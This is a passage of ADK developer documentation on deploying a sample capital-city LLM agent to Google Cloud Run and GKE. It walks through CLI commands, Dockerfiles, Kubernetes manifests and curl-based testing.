`$GOOGLE_CLOUD_LOCATION`, `us-central1`). - `--service_name TEXT`: (Optional) The name for the Cloud Run service (e.g., `$SERVICE_NAME`). Defaults to `adk-default-service-name`. - `--app_name TEXT`: (Optional) The application name for the ADK API server (e.g., `$APP_NAME`). Defaults to the name of the directory specified by `AGENT_PATH` (e.g., `capital_agent` if `AGENT_PATH` is `./capital_agent`). - `--agent_engine_id TEXT`: (Optional) If you are using a managed session service via Vertex AI Agent Engine, provide its resource ID here. - `--port INTEGER`: (Optional) The port number the ADK API server will listen on within the container. Defaults to 8000. - `--with_ui`: (Optional) If included, deploys the ADK dev UI alongside the agent API server. By default, only the API server is deployed. - `--temp_folder TEXT`: (Optional) Specifies a directory for storing intermediate files generated during the deployment process. Defaults to a timestamped folder in the system's temporary directory. *(Note: This option is generally not needed unless troubleshooting issues).* - `--help`: Show the help message and exit. ##### Passing gcloud CLI Arguments To pass specific gcloud flags through the `adk deploy cloud_run` command, use the double-dash separator (`--`) after the ADK arguments. Any flags (except ADK-managed) following the `--` will be passed directly to the underlying gcloud command. ###### Syntax Example: ```bash adk deploy cloud_run [ADK_FLAGS] -- [GCLOUD_FLAGS] ``` ###### Example: ```bash adk deploy cloud_run --project=[PROJECT_ID] --region=[REGION] path/to/my_agent -- --no-allow-unauthenticated --min-instances=2 ``` ##### Authenticated access During the deployment process, you might be prompted: `Allow unauthenticated invocations to [your-service-name] (y/N)?`. - Enter `y` to allow public access to your agent's API endpoint without authentication. - Enter `N` (or press Enter for the default) to require authentication (e.g., using an identity token as shown in the "Testing your agent" section). Upon successful execution, the command deploys your agent to Cloud Run and provide the URL of the deployed service. ### gcloud CLI for Python Alternatively, you can deploy using the standard `gcloud run deploy` command with a `Dockerfile`. This method requires more manual setup compared to the `adk` command but offers flexibility, particularly if you want to embed your agent within a custom [FastAPI](https://fastapi.tiangolo.com/) application. Ensure you have authenticated with Google Cloud (`gcloud auth login` and `gcloud config set project `). #### Project Structure Organize your project files as follows: ```text your-project-directory/ ├── capital_agent/ │ ├── __init__.py │ └── agent.py # Your agent code (see "Agent sample" tab) ├── main.py # FastAPI application entry point ├── requirements.txt # Python dependencies └── Dockerfile # Container build instructions ``` Create the following files (`main.py`, `requirements.txt`, `Dockerfile`) in the root of `your-project-directory/`. #### Code files 1. This file sets up the FastAPI application using `get_fast_api_app()` from ADK: main.py ```python import os import uvicorn from fastapi import FastAPI from google.adk.cli.fast_api import get_fast_api_app # Get the directory where main.py is located AGENT_DIR = os.path.dirname(os.path.abspath(__file__)) # Example session service URI (e.g., SQLite) # Note: Use 'sqlite+aiosqlite' instead of 'sqlite' because DatabaseSessionService requires an async driver SESSION_SERVICE_URI = "sqlite+aiosqlite:///./sessions.db" # Example allowed origins for CORS ALLOWED_ORIGINS = ["http://localhost", "http://localhost:8080", "*"] # Set web=True if you intend to serve a web interface, False otherwise SERVE_WEB_INTERFACE = True # Call the function to get the FastAPI app instance # Ensure the agent directory name ('capital_agent') matches your agent folder app: FastAPI = get_fast_api_app( agents_dir=AGENT_DIR, session_service_uri=SESSION_SERVICE_URI, allow_origins=ALLOWED_ORIGINS, web=SERVE_WEB_INTERFACE, ) # You can add more FastAPI routes or configurations below if needed # Example: # @app.get("/hello") # async def read_root(): # return {"Hello": "World"} if __name__ == "__main__": # Use the PORT environment variable provided by Cloud Run, defaulting to 8080 uvicorn.run(app, host="0.0.0.0", port=int(os.environ.get("PORT", 8080))) ``` *Note: We specify `agent_dir` to the directory `main.py` is in and use `os.environ.get("PORT", 8080)` for Cloud Run compatibility.* 1. List the necessary Python packages: requirements.txt ```text google-adk # Add any other dependencies your agent needs ``` 1. Define the container image: Dockerfile ```dockerfile FROM python:3.13-slim WORKDIR /app COPY requirements.txt . RUN pip install --no-cache-dir -r requirements.txt RUN adduser --disabled-password --gecos "" myuser && \ chown -R myuser:myuser /app COPY . . USER myuser ENV PATH="/home/myuser/.local/bin:$PATH" CMD ["sh", "-c", "uvicorn main:app --host 0.0.0.0 --port $PORT"] ``` #### Defining Multiple Agents You can define and deploy multiple agents within the same Cloud Run instance by creating separate folders in the root of `your-project-directory/`. Each folder represents one agent and must define a `root_agent` in its configuration. Example structure: ```text your-project-directory/ ├── capital_agent/ │ ├── __init__.py │ └── agent.py # contains `root_agent` definition ├── population_agent/ │ ├── __init__.py │ └── agent.py # contains `root_agent` definition └── ... ``` #### Deploy using `gcloud` Navigate to `your-project-directory` in your terminal. ```bash gcloud run deploy capital-agent-service \ --source . \ --region $GOOGLE_CLOUD_LOCATION \ --project $GOOGLE_CLOUD_PROJECT \ --allow-unauthenticated \ --set-env-vars="GOOGLE_CLOUD_PROJECT=$GOOGLE_CLOUD_PROJECT,GOOGLE_CLOUD_LOCATION=$GOOGLE_CLOUD_LOCATION,GOOGLE_GENAI_USE_VERTEXAI=$GOOGLE_GENAI_USE_VERTEXAI" # Add any other necessary environment variables your agent might need ``` - `capital-agent-service`: The name you want to give your Cloud Run service. - `--source .`: Tells gcloud to build the container image from the Dockerfile in the current directory. - `--region`: Specifies the deployment region. - `--project`: Specifies the GCP project. - `--allow-unauthenticated`: Allows public access to the service. Remove this flag for private services. - `--set-env-vars`: Passes necessary environment variables to the running container. Ensure you include all variables required by ADK and your agent (like API keys if not using Application Default Credentials). `gcloud` will build the Docker image, push it to Google Artifact Registry, and deploy it to Cloud Run. Upon completion, it will output the URL of your deployed service. For a full list of deployment options, see the [`gcloud run deploy` reference documentation](https://cloud.google.com/sdk/gcloud/reference/run/deploy). ### adk CLI The adkgo command is located in the google/adk-go repository under cmd/adkgo. Before using it, you need to build it from the root of the adk-go repository: `go build ./cmd/adkgo` The adkgo deploy cloudrun command automates the deployment of your application. You do not need to provide your own Dockerfile. #### Agent Code Structure When using the adkgo tool, your main.go file must use the launcher framework. This is because the tool compiles your code and then runs the resulting executable with specific command-line arguments (like web, api, a2a) to start the required services. The launcher is designed to parse these arguments correctly. Your main.go should look like this: main.go ```go // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package main import ( "context" "fmt" "log" "os" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/cmd/launcher" "google.golang.org/adk/cmd/launcher/full" "google.golang.org/adk/model/gemini" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) type getCapitalCityArgs struct { Country string `json:"country" jsonschema:"The country for which to find the capital city."` } func getCapitalCity(ctx tool.Context, args getCapitalCityArgs) (string, error) { capitals := map[string]string{ "united states": "Washington, D.C.", "canada": "Ottawa", "france": "Paris", "japan": "Tokyo", } capital, ok := capitals[strings.ToLower(args.Country)] if !ok { return "", fmt.Errorf("couldn't find the capital for %s", args.Country) } return capital, nil } func main() { ctx := context.Background() model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{ APIKey: os.Getenv("GOOGLE_API_KEY"), }) if err != nil { log.Fatalf("Failed to create model: %v", err) } capitalTool, err := functiontool.New( functiontool.Config{ Name: "get_capital_city", Description: "Retrieves the capital city for a given country.", }, getCapitalCity, ) if err != nil { log.Fatalf("Failed to create function tool: %v", err) } geoAgent, err := llmagent.New(llmagent.Config{ Name: "capital_agent", Model: model, Description: "Agent to find the capital city of a country.", Instruction: "I can answer your questions about the capital city of a country.", Tools: []tool.Tool{capitalTool}, }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } config := &launcher.Config{ AgentLoader: agent.NewSingleLoader(geoAgent), } l := full.NewLauncher() err = l.Execute(ctx, config, os.Args[1:]) if err != nil { log.Fatalf("run failed: %v\n\n%s", err, l.CommandLineSyntax()) } } ``` #### How it Works 1. The adkgo tool compiles your main.go into a statically linked binary for Linux. 1. It generates a Dockerfile that copies this binary into a minimal container. 1. It uses gcloud to build and deploy this container to Cloud Run. 1. After deployment, it starts a local proxy that securely connects to your new service. Ensure you have authenticated with Google Cloud (`gcloud auth login` and `gcloud config set project `). #### Setup environment variables Optional but recommended: Setting environment variables can make the deployment commands cleaner. ```bash # Set your Google Cloud Project ID export GOOGLE_CLOUD_PROJECT="your-gcp-project-id" # Set your desired Google Cloud Location export GOOGLE_CLOUD_LOCATION="us-central1" # Set the path to your agent's main Go file export AGENT_PATH="./examples/go/cloud-run/main.go" # Set a name for your Cloud Run service export SERVICE_NAME="capital-agent-service" ``` #### Command usage ```bash ./adkgo deploy cloudrun \ -p $GOOGLE_CLOUD_PROJECT \ -r $GOOGLE_CLOUD_LOCATION \ -s $SERVICE_NAME \ --proxy_port=8081 \ --server_port=8080 \ -e $AGENT_PATH \ --a2a --api --webui ``` ##### Required - `-p, --project_name`: Your Google Cloud project ID (e.g., $GOOGLE_CLOUD_PROJECT). - `-r, --region`: The Google Cloud location for deployment (e.g., $GOOGLE_CLOUD_LOCATION, us-central1). - `-s, --service_name`: The name for the Cloud Run service (e.g., $SERVICE_NAME). - `-e, --entry_point_path`: Path to the main Go file containing your agent's source code (e.g., $AGENT_PATH). ##### Optional - `--proxy_port`: The local port for the authenticating proxy to listen on. Defaults to 8081. - `--server_port`: The port number the server will listen on within the Cloud Run container. Defaults to 8080. - `--a2a`: If included, enables Agent2Agent communication. Enabled by default. - `--a2a_agent_url`: A2A agent card URL as advertised in the public agent card. This flag is only valid when used with the --a2a flag. - `--api`: If included, deploys the ADK API server. Enabled by default. - `--webui`: If included, deploys the ADK dev UI alongside the agent API server. Enabled by default. - `--temp_dir`: Temp directory for build artifacts. Defaults to os.TempDir(). - `--help`: Show the help message and exit. ##### Authenticated access The service is deployed with --no-allow-unauthenticated by default. Upon successful execution, the command deploys your agent to Cloud Run and provide a local URL to access the service through the proxy. ### gcloud CLI for Java You can deploy Java Agents using the standard `gcloud run deploy` command and a `Dockerfile`. This is the current recommended way to deploy Java Agents to Google Cloud Run. Ensure you are [authenticated](https://cloud.google.com/docs/authentication/gcloud) with Google Cloud. Specifically, run the commands `gcloud auth login` and `gcloud config set project ` from your terminal. #### Project Structure Organize your project files as follows: ```text your-project-directory/ ├── src/ │ └── main/ │ └── java/ │ └── agents/ │ ├── capitalagent/ │ └── CapitalAgent.java # Your agent code ├── pom.xml # Java adk and adk-dev dependencies └── Dockerfile # Container build instructions ``` Create the `pom.xml` and `Dockerfile` in the root of your project directory. Your Agent code file (`CapitalAgent.java`) inside a directory as shown above. #### Code files 1. This is our Agent definition. This is the same code as present in [LLM agent](https://google.github.io/adk-docs/agents/llm-agents/index.md) with two caveats: - The Agent is now initialized as a **global public static final variable**. - The definition of the agent can be exposed in a static method or inlined during declaration. See the code for the `CapitalAgent` example in the [examples](https://github.com/google/adk-docs/blob/main/examples/java/cloud-run/src/main/java/agents/capitalagent/CapitalAgent.java) repository. 1. Add the following dependencies and plugin to the pom.xml file. pom.xml ```xml com.google.adk google-adk 0.5.0 com.google.adk google-adk-dev 0.5.0 org.codehaus.mojo exec-maven-plugin 3.2.0 com.google.adk.web.AdkWebServer compile ``` 1. Define the container image: Dockerfile ```dockerfile # Use an official Maven image with a JDK. Choose a version appropriate for your project. FROM maven:3.8-openjdk-17 AS builder WORKDIR /app COPY pom.xml . RUN mvn dependency:go-offline -B COPY src ./src # Expose the port your application will listen on. # Cloud Run will set the PORT environment variable, which your app should use. EXPOSE 8080 # The command to run your application. # Use a shell so ${PORT} expands and quote exec.args so agent source-dir is passed correctly. ENTRYPOINT ["sh", "-c", "mvn compile exec:java \ -Dexec.mainClass=com.google.adk.web.AdkWebServer \ -Dexec.classpathScope=compile \ -Dexec.args='--server.port=${PORT:-8080} --adk.agents.source-dir=target'"] ``` #### Deploy using `gcloud` Navigate to `your-project-directory` in your terminal. ```bash gcloud run deploy capital-agent-service \ --source . \ --region $GOOGLE_CLOUD_LOCATION \ --project $GOOGLE_CLOUD_PROJECT \ --allow-unauthenticated \ --set-env-vars="GOOGLE_CLOUD_PROJECT=$GOOGLE_CLOUD_PROJECT,GOOGLE_CLOUD_LOCATION=$GOOGLE_CLOUD_LOCATION,GOOGLE_GENAI_USE_VERTEXAI=$GOOGLE_GENAI_USE_VERTEXAI" # Add any other necessary environment variables your agent might need ``` - `capital-agent-service`: The name you want to give your Cloud Run service. - `--source .`: Tells gcloud to build the container image from the Dockerfile in the current directory. - `--region`: Specifies the deployment region. - `--project`: Specifies the GCP project. - `--allow-unauthenticated`: Allows public access to the service. Remove this flag for private services. - `--set-env-vars`: Passes necessary environment variables to the running container. Ensure you include all variables required by ADK and your agent (like API keys if not using Application Default Credentials). `gcloud` will build the Docker image, push it to Google Artifact Registry, and deploy it to Cloud Run. Upon completion, it will output the URL of your deployed service. For a full list of deployment options, see the [`gcloud run deploy` reference documentation](https://cloud.google.com/sdk/gcloud/reference/run/deploy). ## Testing your agent Once your agent is deployed to Cloud Run, you can interact with it via the deployed UI (if enabled) or directly with its API endpoints using tools like `curl`. You'll need the service URL provided after deployment. ### UI Testing If you deployed your agent with the UI enabled: - **adk CLI:** You included the `--webui` flag during deployment. - **gcloud CLI:** You set `SERVE_WEB_INTERFACE = True` in your `main.py`. You can test your agent by simply navigating to the Cloud Run service URL provided after deployment in your web browser. ```bash # Example URL format # https://your-service-name-abc123xyz.a.run.app ``` The ADK dev UI allows you to interact with your agent, manage sessions, and view execution details directly in the browser. To verify your agent is working as intended, you can: 1. Select your agent from the dropdown menu. 1. Type a message and verify that you receive an expected response from your agent. If you experience any unexpected behavior, check the [Cloud Run](https://console.cloud.google.com/run) console logs. ### API Testing (curl) You can interact with the agent's API endpoints using tools like `curl`. This is useful for programmatic interaction or if you deployed without the UI. You'll need the service URL provided after deployment and potentially an identity token for authentication if your service isn't set to allow unauthenticated access. #### Set the application URL Replace the example URL with the actual URL of your deployed Cloud Run service. ```bash export APP_URL="YOUR_CLOUD_RUN_SERVICE_URL" # Example: export APP_URL="https://adk-default-service-name-abc123xyz.a.run.app" ``` #### Get an identity token (if needed) If your service requires authentication (i.e., you didn't use `--allow-unauthenticated` with `gcloud` or answered 'N' to the prompt with `adk`), obtain an identity token. ```bash export TOKEN=$(gcloud auth print-identity-token) ``` *If your service allows unauthenticated access, you can omit the `-H "Authorization: Bearer $TOKEN"` header from the `curl` commands below.* #### List available apps Verify the deployed application name. ```bash curl -X GET -H "Authorization: Bearer $TOKEN" $APP_URL/list-apps ``` *(Adjust the `app_name` in the following commands based on this output if needed. The default is often the agent directory name, e.g., `capital_agent`)*. #### Create or Update a Session Initialize or update the state for a specific user and session. Replace `capital_agent` with your actual app name if different. The values `user_123` and `session_abc` are example identifiers; you can replace them with your desired user and session IDs. ```bash curl -X POST -H "Authorization: Bearer $TOKEN" \ $APP_URL/apps/capital_agent/users/user_123/sessions/session_abc \ -H "Content-Type: application/json" \ -d '{"preferred_language": "English", "visit_count": 5}' ``` #### Run the Agent Send a prompt to your agent. Replace `capital_agent` with your app name and adjust the user/session IDs and prompt as needed. ```bash curl -X POST -H "Authorization: Bearer $TOKEN" \ $APP_URL/run_sse \ -H "Content-Type: application/json" \ -d '{ "app_name": "capital_agent", "user_id": "user_123", "session_id": "session_abc", "new_message": { "role": "user", "parts": [{ "text": "What is the capital of Canada?" }] }, "streaming": false }' ``` - Set `"streaming": true` if you want to receive Server-Sent Events (SSE). - The response will contain the agent's execution events, including the final answer. # Deploy to Google Kubernetes Engine (GKE) Supported in ADKPython [GKE](https://cloud.google.com/gke) is the Google Cloud managed Kubernetes service. It allows you to deploy and manage containerized applications using Kubernetes. To deploy your agent you will need to have a Kubernetes cluster running on GKE. You can create a cluster using the Google Cloud Console or the `gcloud` command line tool. In this example we will deploy a simple agent to GKE. The agent will be a FastAPI application that uses `Gemini 2.0 Flash` as the LLM. We can use Vertex AI or AI Studio as the LLM provider using the Environment variable `GOOGLE_GENAI_USE_VERTEXAI`. ## Environment variables Set your environment variables as described in the [Setup and Installation](https://google.github.io/adk-docs/get-started/installation/index.md) guide. You also need to install the `kubectl` command line tool. You can find instructions to do so in the [Google Kubernetes Engine Documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl). ```bash export GOOGLE_CLOUD_PROJECT=your-project-id # Your GCP project ID export GOOGLE_CLOUD_LOCATION=us-central1 # Or your preferred location export GOOGLE_GENAI_USE_VERTEXAI=true # Set to true if using Vertex AI export GOOGLE_CLOUD_PROJECT_NUMBER=$(gcloud projects describe --format json $GOOGLE_CLOUD_PROJECT | jq -r ".projectNumber") ``` If you don't have `jq` installed, you can use the following command to get the project number: ```bash gcloud projects describe $GOOGLE_CLOUD_PROJECT ``` And copy the project number from the output. ```bash export GOOGLE_CLOUD_PROJECT_NUMBER=YOUR_PROJECT_NUMBER ``` ## Enable APIs and Permissions Ensure you have authenticated with Google Cloud (`gcloud auth login` and `gcloud config set project `). Enable the necessary APIs for your project. You can do this using the `gcloud` command line tool. ```bash gcloud services enable \ container.googleapis.com \ artifactregistry.googleapis.com \ cloudbuild.googleapis.com \ aiplatform.googleapis.com ``` Grant necessary roles to the default compute engine service account required by the `gcloud builds submit` command. ```bash ROLES_TO_ASSIGN=( "roles/artifactregistry.writer" "roles/storage.objectViewer" "roles/logging.viewer" "roles/logging.logWriter" ) for ROLE in "${ROLES_TO_ASSIGN[@]}"; do gcloud projects add-iam-policy-binding "${GOOGLE_CLOUD_PROJECT}" \ --member="serviceAccount:${GOOGLE_CLOUD_PROJECT_NUMBER}-compute@developer.gserviceaccount.com" \ --role="${ROLE}" done ``` ## Deployment payload When you deploy your ADK agent workflow to the Google Cloud GKE, the following content is uploaded to the service: - Your ADK agent code - Any dependencies declared in your ADK agent code - ADK API server code version used by your agent The default deployment *does not* include the ADK web user interface libraries, unless you specify it as deployment setting, such as the `--with_ui` option for `adk deploy gke` command. ## Deployment options You can deploy your agent to GKE either **manually using Kubernetes manifests** or **automatically using the `adk deploy gke` command**. Choose the approach that best suits your workflow. ## Option 1: Manual Deployment using gcloud and kubectl ### Create a GKE cluster You can create a GKE cluster using the `gcloud` command line tool. This example creates an Autopilot cluster named `adk-cluster` in the `us-central1` region. > If creating a GKE Standard cluster, make sure [Workload Identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity) is enabled. Workload Identity is enabled by default in an AutoPilot cluster. ```bash gcloud container clusters create-auto adk-cluster \ --location=$GOOGLE_CLOUD_LOCATION \ --project=$GOOGLE_CLOUD_PROJECT ``` After creating the cluster, you need to connect to it using `kubectl`. This command configures `kubectl` to use the credentials for your new cluster. ```bash gcloud container clusters get-credentials adk-cluster \ --location=$GOOGLE_CLOUD_LOCATION \ --project=$GOOGLE_CLOUD_PROJECT ``` ### Create Your Agent We will reference the `capital_agent` example defined on the [LLM agents](https://google.github.io/adk-docs/agents/llm-agents/index.md) page. To proceed, organize your project files as follows: ```text your-project-directory/ ├── capital_agent/ │ ├── __init__.py │ └── agent.py # Your agent code (see "Capital Agent example" below) ├── main.py # FastAPI application entry point ├── requirements.txt # Python dependencies └── Dockerfile # Container build instructions ``` ### Code files Create the following files (`main.py`, `requirements.txt`, `Dockerfile`, `capital_agent/agent.py`, `capital_agent/__init__.py`) in the root of `your-project-directory/`. 1. This is the Capital Agent example inside the `capital_agent` directory capital_agent/agent.py ```python from google.adk.agents import LlmAgent # Define a tool function def get_capital_city(country: str) -> str: """Retrieves the capital city for a given country.""" # Replace with actual logic (e.g., API call, database lookup) capitals = {"france": "Paris", "japan": "Tokyo", "canada": "Ottawa"} return capitals.get(country.lower(), f"Sorry, I don't know the capital of {country}.") # Add the tool to the agent capital_agent = LlmAgent( model="gemini-2.0-flash", name="capital_agent", #name of your agent description="Answers user questions about the capital city of a given country.", instruction="""You are an agent that provides the capital city of a country... (previous instruction text)""", tools=[get_capital_city] # Provide the function directly ) # ADK will discover the root_agent instance root_agent = capital_agent ``` Mark your directory as a python package capital_agent/__init__.py ```python from . import agent ``` 1. This file sets up the FastAPI application using `get_fast_api_app()` from ADK: main.py ```python import os import uvicorn from fastapi import FastAPI from google.adk.cli.fast_api import get_fast_api_app # Get the directory where main.py is located AGENT_DIR = os.path.dirname(os.path.abspath(__file__)) # Example session service URI (e.g., SQLite) # Note: Use 'sqlite+aiosqlite' instead of 'sqlite' because DatabaseSessionService requires an async driver SESSION_SERVICE_URI = "sqlite+aiosqlite:///./sessions.db" # Example allowed origins for CORS ALLOWED_ORIGINS = ["http://localhost", "http://localhost:8080", "*"] # Set web=True if you intend to serve a web interface, False otherwise SERVE_WEB_INTERFACE = True # Call the function to get the FastAPI app instance # Ensure the agent directory name ('capital_agent') matches your agent folder app: FastAPI = get_fast_api_app( agents_dir=AGENT_DIR, session_service_uri=SESSION_SERVICE_URI, allow_origins=ALLOWED_ORIGINS, web=SERVE_WEB_INTERFACE, ) # You can add more FastAPI routes or configurations below if needed # Example: # @app.get("/hello") # async def read_root(): # return {"Hello": "World"} if __name__ == "__main__": # Use the PORT environment variable provided by Cloud Run, defaulting to 8080 uvicorn.run(app, host="0.0.0.0", port=int(os.environ.get("PORT", 8080))) ``` *Note: We specify `agent_dir` to the directory `main.py` is in and use `os.environ.get("PORT", 8080)` for Cloud Run compatibility.* 1. List the necessary Python packages: requirements.txt ```text google-adk # Add any other dependencies your agent needs ``` 1. Define the container image: Dockerfile ```dockerfile FROM python:3.13-slim WORKDIR /app COPY requirements.txt . RUN pip install --no-cache-dir -r requirements.txt RUN adduser --disabled-password --gecos "" myuser && \ chown -R myuser:myuser /app COPY . . USER myuser ENV PATH="/home/myuser/.local/bin:$PATH" CMD ["sh", "-c", "uvicorn main:app --host 0.0.0.0 --port $PORT"] ``` ### Build the container image You need to create a Google Artifact Registry repository to store your container images. You can do this using the `gcloud` command line tool. ```bash gcloud artifacts repositories create adk-repo \ --repository-format=docker \ --location=$GOOGLE_CLOUD_LOCATION \ --description="ADK repository" ``` Build the container image using the `gcloud` command line tool. This example builds the image and tags it as `adk-repo/adk-agent:latest`. ```bash gcloud builds submit \ --tag $GOOGLE_CLOUD_LOCATION-docker.pkg.dev/$GOOGLE_CLOUD_PROJECT/adk-repo/adk-agent:latest \ --project=$GOOGLE_CLOUD_PROJECT \ . ``` Verify the image is built and pushed to the Artifact Registry: ```bash gcloud artifacts docker images list \ $GOOGLE_CLOUD_LOCATION-docker.pkg.dev/$GOOGLE_CLOUD_PROJECT/adk-repo \ --project=$GOOGLE_CLOUD_PROJECT ``` ### Configure Kubernetes Service Account for Vertex AI If your agent uses Vertex AI, you need to create a Kubernetes service account with the necessary permissions. This example creates a service account named `adk-agent-sa` and binds it to the `Vertex AI User` role. > If you are using AI Studio and accessing the model with an API key you can skip this step. ```bash kubectl create serviceaccount adk-agent-sa ``` ```bash gcloud projects add-iam-policy-binding projects/${GOOGLE_CLOUD_PROJECT} \ --role=roles/aiplatform.user \ --member=principal://iam.googleapis.com/projects/${GOOGLE_CLOUD_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GOOGLE_CLOUD_PROJECT}.svc.id.goog/subject/ns/default/sa/adk-agent-sa \ --condition=None ``` ### Create the Kubernetes manifest files Create a Kubernetes deployment manifest file named `deployment.yaml` in your project directory. This file defines how to deploy your application on GKE. deployment.yaml ```yaml cat << EOF > deployment.yaml apiVersion: apps/v1 kind: Deployment metadata: name: adk-agent spec: replicas: 1 selector: matchLabels: app: adk-agent template: metadata: labels: app: adk-agent spec: serviceAccount: adk-agent-sa containers: - name: adk-agent imagePullPolicy: Always image: $GOOGLE_CLOUD_LOCATION-docker.pkg.dev/$GOOGLE_CLOUD_PROJECT/adk-repo/adk-agent:latest resources: limits: memory: "128Mi" cpu: "500m" ephemeral-storage: "128Mi" requests: memory: "128Mi" cpu: "500m" ephemeral-storage: "128Mi" ports: - containerPort: 8080 env: - name: PORT value: "8080" - name: GOOGLE_CLOUD_PROJECT value: $GOOGLE_CLOUD_PROJECT - name: GOOGLE_CLOUD_LOCATION value: $GOOGLE_CLOUD_LOCATION - name: GOOGLE_GENAI_USE_VERTEXAI value: "$GOOGLE_GENAI_USE_VERTEXAI" # If using AI Studio, set GOOGLE_GENAI_USE_VERTEXAI to false and set the following: # - name: GOOGLE_API_KEY # value: $GOOGLE_API_KEY # Add any other necessary environment variables your agent might need --- apiVersion: v1 kind: Service metadata: name: adk-agent spec: type: LoadBalancer ports: - port: 80 targetPort: 8080 selector: app: adk-agent EOF ``` ### Deploy the Application Deploy the application using the `kubectl` command line tool. This command applies the deployment and service manifest files to your GKE cluster. ```bash kubectl apply -f deployment.yaml ``` After a few moments, you can check the status of your deployment using: ```bash kubectl get pods -l=app=adk-agent ``` This command lists the pods associated with your deployment. You should see a pod with a status of `Running`. Once the pod is running, you can check the status of the service using: ```bash kubectl get service adk-agent ``` If the output shows a `External IP`, it means your service is accessible from the internet. It may take a few minutes for the external IP to be assigned. You can get the external IP address of your service using: ```bash kubectl get svc adk-agent -o=jsonpath='{.status.loadBalancer.ingress[0].ip}' ``` ## Option 2: Automated Deployment using `adk deploy gke` ADK provides a CLI command to streamline GKE deployment. This avoids the need to manually build images, write Kubernetes manifests, or push to Artifact Registry. #### Prerequisites Before you begin, ensure you have the following set up: 1. **A running GKE cluster:** You need an active Kubernetes cluster on Google Cloud. 1. **Required CLIs:** - **`gcloud` CLI:** The Google Cloud CLI must be installed, authenticated, and configured to use your target project. Run `gcloud auth login` and `gcloud config set project [YOUR_PROJECT_ID]`. - **kubectl:** The Kubernetes CLI must be installed to deploy the application to your cluster. 1. **Enabled Google Cloud APIs:** Make sure the following APIs are enabled in your Google Cloud project: - Kubernetes Engine API (`container.googleapis.com`) - Cloud Build API (`cloudbuild.googleapis.com`) - Container Registry API (`containerregistry.googleapis.com`) 1. **Required IAM Permissions:** The user or Compute Engine default service account running the command needs, at a minimum, the following roles: 1. **Kubernetes Engine Developer** (`roles/container.developer`): To interact with the GKE cluster. 1. **Storage Object Viewer** (`roles/storage.objectViewer`): To allow Cloud Build to download the source code from the Cloud Storage bucket where gcloud builds submit uploads it. 1. **Artifact Registry Create on Push Writer** (`roles/artifactregistry.createOnPushWriter`): To allow Cloud Build to push the built container image to Artifact Registry. This role also permits the on-the-fly creation of the special gcr.io repository within Artifact Registry if needed on the first push. 1. **Logs Writer** (`roles/logging.logWriter`): To allow Cloud Build to write build logs to Cloud Logging. ### The `deploy gke` Command The command takes the path to your agent and parameters specifying the target GKE cluster. #### Syntax ```bash adk deploy gke [OPTIONS] AGENT_PATH ``` ### Arguments & Options | Argument | Description | Required | | -------------- | ---------------------------------------------------------------------------------------- | -------- | | AGENT_PATH | The local file path to your agent's root directory. | Yes | | --project | The Google Cloud Project ID where your GKE cluster is located. | Yes | | --cluster_name | The name of your GKE cluster. | Yes | | --region | The Google Cloud region of your cluster (e.g., us-central1). | Yes | | --with_ui | Deploys both the agent's back-end API and a companion front-end user interface. | No | | --log_level | Sets the logging level for the deployment process. Options: debug, info, warning, error. | No | ### How It Works When you run the `adk deploy gke` command, the ADK performs the following steps automatically: - Containerization: It builds a Docker container image from your agent's source code. - Image Push: It tags the container image and pushes it to your project's Artifact Registry. - Manifest Generation: It dynamically generates the necessary Kubernetes manifest files (a `Deployment` and a `Service`). - Cluster Deployment: It applies these manifests to your specified GKE cluster, which triggers the following: The `Deployment` instructs GKE to pull the container image from Artifact Registry and run it in one or more Pods. The `Service` creates a stable network endpoint for your agent. By default, this is a LoadBalancer service, which provisions a public IP address to expose your agent to the internet. ### Example Usage Here is a practical example of deploying an agent located at `~/agents/multi_tool_agent/` to a GKE cluster named test. ```bash adk deploy gke \ --project myproject \ --cluster_name test \ --region us-central1 \ --with_ui \ --log_level info \ ~/agents/multi_tool_agent/ ``` ### Verifying Your Deployment If you used `adk deploy gke`, verify the deployment using `kubectl`: 1. Check the Pods: Ensure your agent's pods are in the Running state. ```bash kubectl get pods ``` You should see output like `adk-default-service-name-xxxx-xxxx ... 1/1 Running` in the default namespace. 1. Find the External IP: Get the public IP address for your agent's service. ```bash kubectl get service NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE adk-default-service-name LoadBalancer 34.118.228.70 34.63.153.253 80:32581/TCP 5d20h ``` We can navigate to the external IP and interact with the agent via UI ## Testing your agent Once your agent is deployed to GKE, you can interact with it via the deployed UI (if enabled) or directly with its API endpoints using tools like `curl`. You'll need the service URL provided after deployment. ### UI Testing If you deployed your agent with the UI enabled: You can test your agent by simply navigating to the kubernetes service URL in your web browser. The ADK dev UI allows you to interact with your agent, manage sessions, and view execution details directly in the browser. To verify your agent is working as intended, you can: 1. Select your agent from the dropdown menu. 1. Type a message and verify that you receive an expected response from your agent. If you experience any unexpected behavior, check the pod logs for your agent using: ```bash kubectl logs -l app=adk-agent ``` ### API Testing (curl) You can interact with the agent's API endpoints using tools like `curl`. This is useful for programmatic interaction or if you deployed without the UI. #### Set the application URL Replace the example URL with the actual URL of your deployed Cloud Run service. ```bash export APP_URL=$(kubectl get service adk-agent -o jsonpath='{.status.loadBalancer.ingress[0].ip}') ``` #### List available apps Verify the deployed application name. ```bash curl -X GET $APP_URL/list-apps ``` *(Adjust the `app_name` in the following commands based on this output if needed. The default is often the agent directory name, e.g., `capital_agent`)*. #### Create or Update a Session Initialize or update the state for a specific user and session. Replace `capital_agent` with your actual app name if different. The values `user_123` and `session_abc` are example identifiers; you can replace them with your desired user and session IDs. ```bash curl -X POST \ $APP_URL/apps/capital_agent/users/user_123/sessions/session_abc \ -H "Content-Type: application/json" \ -d '{"preferred_language": "English", "visit_count": 5}' ``` #### Run the Agent Send a prompt to your agent. Replace `capital_agent` with your app name and adjust the 